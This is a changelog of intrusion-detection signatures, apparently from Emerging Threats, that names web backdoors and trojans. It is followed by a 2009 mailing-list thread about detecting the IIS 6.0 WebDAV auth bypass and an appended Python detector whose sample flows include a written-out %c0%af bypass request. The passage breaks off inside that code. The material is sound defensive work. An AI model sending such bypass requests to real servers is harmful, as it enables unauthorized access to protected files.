url,milw0rm.com/exploits/8208 2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NicLOR || url,doc.emergingthreats.net/2009335 || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112 2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009336 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009337 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009338 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009339 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009340 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009341 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009342 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009343 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009344 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009345 2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009346 2009347 || ET TROJAN Tigger.a/Syzor Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Tigger || url,doc.emergingthreats.net/2009347 2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Worldpay || url,doc.emergingthreats.net/2009348 || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/ 2009349 || ET TROJAN Metafisher/Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349 2009350 || ET TROJAN Win32.Hupigon Control Server Response || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Hupington || url,doc.emergingthreats.net/2009350 2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bebloh || url,doc.emergingthreats.net/2009351 || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td -> Added to emerging-virus.rules (2): #by shirkdog #disabling for now. 
this same payload seems to be used by a number of ping libraries -> Added to emerging.rules (1): #by Veerendra at secpod.com [---] Removed non-rule lines: [---] -> Removed from emerging-drop-BLOCK.rules (2): # VERSION 1534 # Generated 2009-05-09 00:03:03 EDT -> Removed from emerging-drop.rules (2): # VERSION 1534 # Generated 2009-05-09 00:03:03 EDT -> Removed from emerging-exploit.rules (2): #This is a good auth back from the server #this is for a server saying auth failed -> Removed from emerging-sid-msg.map (177): 2001621 || ET Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953 2001716 || ET Web IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716 2001810 || ET EXPLOIT WEB PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810 2002035 || ET MALWARE Better Internet Spyware User Agent Activity (thin) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents || url,doc.emergingthreats.net/bin/view/Main/2002035 2002792 || ET TROJAN Win32.Agent Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_W32Agent.dsi || url,doc.emergingthreats.net/2002792 2002838 || ET Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET WEB-MISC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2003520 || ET EXPLOIT webCalendar Remote File include || 
-> Removed from emerging-sid-msg.map.txt (177):
COMPROMISED Known Compromised or Hostile Host Traffic (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500096 || ET COMPROMISED Known Compromised or Hostile Host Traffic (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500097 || ET COMPROMISED Known Compromised or Hostile Host Traffic (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500098 || ET COMPROMISED Known Compromised or Hostile Host Traffic (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500099 || ET COMPROMISED Known Compromised or Hostile Host Traffic (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500100 || ET COMPROMISED Known Compromised or Hostile Host Traffic (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500101 || ET COMPROMISED Known Compromised or Hostile Host Traffic (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500102 || ET COMPROMISED Known Compromised or Hostile Host Traffic (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500103 || ET COMPROMISED Known Compromised or Hostile Host Traffic (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500104 || ET COMPROMISED Known Compromised or Hostile Host Traffic (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500105 || ET COMPROMISED Known Compromised or Hostile Host Traffic (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500106 || ET COMPROMISED Known Compromised or Hostile Host Traffic (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500107 || ET COMPROMISED Known Compromised or Hostile Host Traffic (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500108 || ET COMPROMISED Known Compromised or Hostile Host Traffic (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500109 || ET COMPROMISED Known Compromised or Hostile Host Traffic (110) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500110 || ET COMPROMISED Known Compromised or Hostile Host Traffic (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500111 || ET COMPROMISED Known Compromised or Hostile Host Traffic (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500112 || ET COMPROMISED Known Compromised or Hostile Host Traffic (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500113 || ET COMPROMISED Known Compromised or Hostile Host Traffic (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500114 || ET COMPROMISED Known Compromised or Hostile Host Traffic (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500115 || ET COMPROMISED Known Compromised or Hostile Host Traffic (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500116 || ET COMPROMISED Known Compromised or Hostile Host Traffic (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500117 || ET COMPROMISED Known Compromised or Hostile Host Traffic (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500118 || ET COMPROMISED Known Compromised or Hostile Host Traffic (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500119 || ET COMPROMISED Known Compromised or Hostile Host Traffic (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500120 || ET COMPROMISED Known Compromised or Hostile Host Traffic (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500121 || ET COMPROMISED Known Compromised or Hostile Host Traffic (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500122 || ET COMPROMISED Known Compromised or Hostile Host Traffic (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500124 || ET COMPROMISED Known 
Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510082 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510083 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510084 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510085 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510086 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510087 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510088 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510089 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510090 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510091 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510092 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510093 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510094 || ET COMPROMISED Known 
Compromised or Hostile Host Traffic - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510095 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510096 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510097 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510098 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510099 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510100 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510101 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510102 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510103 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510104 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510105 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510106 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510107 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (108) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510108 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510109 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510110 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510111 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510112 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510113 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510114 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510115 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510116 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510117 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510118 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510119 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510120 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510121 || ET COMPROMISED 
Known Compromised or Hostile Host Traffic - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510122 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-virus.rules (1): #By Tom Fischer From dxp2532 at gmail.com Sun May 17 00:55:18 2009 From: dxp2532 at gmail.com (dxp) Date: Sun, 17 May 2009 00:55:18 -0400 Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass In-Reply-To: References: Message-ID: <1242536118.7390.20.camel@kinta> The text by Kingcope on milw0rm does specify the "translage: f" header in the first two examples. I have not tested this but it appears, if I read the advisory correctly, that this additional header is required to exploit the vulnerability. Without it the signature would pick up on many different web scans and woulld not be specific to this vulnerability. - -=[ dxp ]=- 0xA3F3C6E3 On Sat, 2009-05-16 at 17:13 -0400, Nick Randolph wrote: > I'm submitting this for the recent IIS 6.0 vulnerability > http://isc.sans.org/diary.html?storyid=6397 > > alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote > Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af"; > nocase; reference:url,isc.sans.org/diary.html?storyid=6397; > sid:xxxxxx; gid:1; rev:1;) > > I also read that "translate: f" was required but the information on > milw0rm.com did not use that in all 3 examples. 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

From phatbuckett at gmail.com Sun May 17 09:28:45 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Sun, 17 May 2009 06:28:45 -0700
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242536118.7390.20.camel@kinta>
References: <1242536118.7390.20.camel@kinta>
Message-ID: <839aec700905170628u5447a823xe185abc6e2d68d04@mail.gmail.com>

Would it work the way I think to flowbit the request (with the submitted rule) and look for a 200 status code in the response to flag successful exploitation? I'd expect a failure would result in something like a 40x (unauthorized, not found) or other error code.

DS

On Sat, May 16, 2009 at 9:55 PM, dxp wrote:
> The text by Kingcope on milw0rm does specify the "translate: f" header in
> the first two examples. I have not tested this but it appears, if I read
> the advisory correctly, that this additional header is required to exploit
> the vulnerability. Without it the signature would pick up on many different
> web scans and would not be specific to this vulnerability.
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
> On Sat, 2009-05-16 at 17:13 -0400, Nick Randolph wrote:
>
> I'm submitting this for the recent IIS 6.0 vulnerability
> http://isc.sans.org/diary.html?storyid=6397
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> sid:xxxxxx; gid:1; rev:1;)
>
> I also read that "translate: f" was required but the information on
> milw0rm.com did not use that in all 3 examples.

--
Darren Spruell
phatbuckett at gmail.com

From dxp2532 at gmail.com Sun May 17 13:12:50 2009
From: dxp2532 at gmail.com (dxp)
Date: Sun, 17 May 2009 13:12:50 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <839aec700905170628u5447a823xe185abc6e2d68d04@mail.gmail.com>
References: <1242536118.7390.20.camel@kinta> <839aec700905170628u5447a823xe185abc6e2d68d04@mail.gmail.com>
Message-ID: <1242580370.7390.33.camel@kinta>

That's a good idea. However, I think there may be a need for some to see alerts on attempts. So, adding a flowbits in the first rule is good as long as the "noalert" is excluded. Then a second rule for HTTP 200 and check the first flowbit, with increased priority.

PS: perhaps having generic flowbits rules for common HTTP status codes may be useful, to avoid redundant rules which rely on responses. This probably depends on what's currently in the ruleset, I haven't checked.

-=[ dxp ]=-
0xA3F3C6E3

On Sun, 2009-05-17 at 06:28 -0700, Darren Spruell wrote:
> Would it work the way I think to flowbit the request (with the
> submitted rule) and look for a 200 status code in the response to flag
> successful exploitation? I'd expect a failure would result in
> something like a 40x (unauthorized, not found) or other error code.
>
> DS
>
> On Sat, May 16, 2009 at 9:55 PM, dxp wrote:
> > The text by Kingcope on milw0rm does specify the "translate: f" header in
> > the first two examples. I have not tested this but it appears, if I read
> > the advisory correctly, that this additional header is required to exploit
> > the vulnerability. Without it the signature would pick up on many different
> > web scans and would not be specific to this vulnerability.
> >
> > -=[ dxp ]=-
> > 0xA3F3C6E3
> >
> > On Sat, 2009-05-16 at 17:13 -0400, Nick Randolph wrote:
> >
> > I'm submitting this for the recent IIS 6.0 vulnerability
> > http://isc.sans.org/diary.html?storyid=6397
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> > Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
> > nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> > sid:xxxxxx; gid:1; rev:1;)
> >
> > I also read that "translate: f" was required but the information on
> > milw0rm.com did not use that in all 3 examples.
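The two-stage detection Darren and dxp sketch above, written out as runnable logic. This is an added example, not code from the list or from the Emerging Threats ruleset: it models Snort's flowbits with a per-flow set, fires the attempt alert on a request that carries both the |25|c0|25|af URI content from Nick's rule and the "Translate: f" header dxp refers to (the first rule, with no noalert), and raises a higher-priority alert when the server answers that flow with a 200. It goes a little beyond the thread in two places: a %c0%af URI without Translate: f is reported as a low-priority scan hit rather than ignored, and the flag is cleared once a response has been seen so one request cannot taint later responses on a keep-alive connection. Hosts, alert messages, the flag name and the sample request/response pairs are constructed for the example.

```python
"""Two-stage detection for the IIS 6.0 WebDAV auth-bypass traffic pattern,
modelled on Snort flowbits. Added example; the sample traffic is constructed."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# uricontent:"|25|c0|25|af" is the bytes "%c0%af" (an overlong UTF-8 encoding
# of "/"); matched case-insensitively, like the rule's nocase.
OVERLONG_SLASH = re.compile(rb"%c0%af", re.IGNORECASE)
# Status line of an HTTP/1.x response; group 1 is the three-digit status code.
STATUS_LINE = re.compile(rb"^HTTP/1\.[01] (\d{3})\b")
# Hypothetical flag name; stands in for flowbits:set / flowbits:isset.
BYPASS_BIT = "iis6.webdav.bypass"


@dataclass
class FlowState:
    """Per-connection state, the role Snort's flowbits play per session."""
    bits: Set[str] = field(default_factory=set)


@dataclass(frozen=True)
class Alert:
    flow: str
    msg: str
    priority: int  # 1 is highest, as with Snort's priority keyword


def parse_request(raw: bytes) -> Tuple[bytes, bytes, Dict[bytes, bytes]]:
    """Split a raw HTTP request into (method, uri, headers); names lower-cased."""
    lines = raw.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def inspect_request(flow: str, raw: bytes, state: FlowState) -> List[Alert]:
    """Stage one (to_server): alert on the attempt and set the flowbit.
    The high-confidence alert needs both the %c0%af URI and Translate: f;
    the URI alone is reported at lower priority as a probable scanner hit."""
    try:
        _method, uri, headers = parse_request(raw)
    except ValueError:
        return []
    if not OVERLONG_SLASH.search(uri):
        return []
    if headers.get(b"translate", b"").lower() == b"f":
        state.bits.add(BYPASS_BIT)  # flowbits:set, and the attempt still alerts
        return [Alert(flow, "IIS6.0 WebDav Remote Auth Bypass attempt", 2)]
    return [Alert(flow, "Overlong UTF-8 slash %c0%af in URI (possible web scan)", 3)]


def inspect_response(flow: str, raw: bytes, state: FlowState) -> List[Alert]:
    """Stage two (to_client): a 200 on a flagged flow means the bypass likely worked."""
    m = STATUS_LINE.match(raw)
    if not m or BYPASS_BIT not in state.bits:
        return []
    state.bits.discard(BYPASS_BIT)  # consume the bit (flowbits:unset in Snort)
    if int(m.group(1)) == 200:
        return [Alert(flow, "IIS6.0 WebDav Remote Auth Bypass successful (200 OK)", 1)]
    return []  # 401/404/...: the stage-one attempt alert already fired


def run(flows: Dict[str, List[Tuple[str, bytes]]]) -> List[Alert]:
    """Feed each flow's messages, in order, through both stages."""
    alerts: List[Alert] = []
    for flow, messages in flows.items():
        state = FlowState()
        for direction, raw in messages:
            stage = inspect_request if direction == "to_server" else inspect_response
            alerts.extend(stage(flow, raw, state))
    return alerts


# Constructed sample flows with hypothetical hosts; not real captures.
SAMPLE_FLOWS: Dict[str, List[Tuple[str, bytes]]] = {
    # Bypass attempt answered with 200: both alerts fire.
    "10.0.0.5:41001->192.0.2.10:80": [
        ("to_server", b"GET /..%c0%af/protected/secret.txt HTTP/1.1\r\nHost: 192.0.2.10\r\nTranslate: f\r\n\r\n"),
        ("to_client", b"HTTP/1.1 200 OK\r\nContent-Length: 6\r\n\r\nsecret"),
    ],
    # Same request in mixed case, refused by the server: attempt only.
    "10.0.0.5:41002->192.0.2.10:80": [
        ("to_server", b"GET /..%C0%AF/protected/secret.txt HTTP/1.1\r\nHost: 192.0.2.10\r\ntranslate: F\r\n\r\n"),
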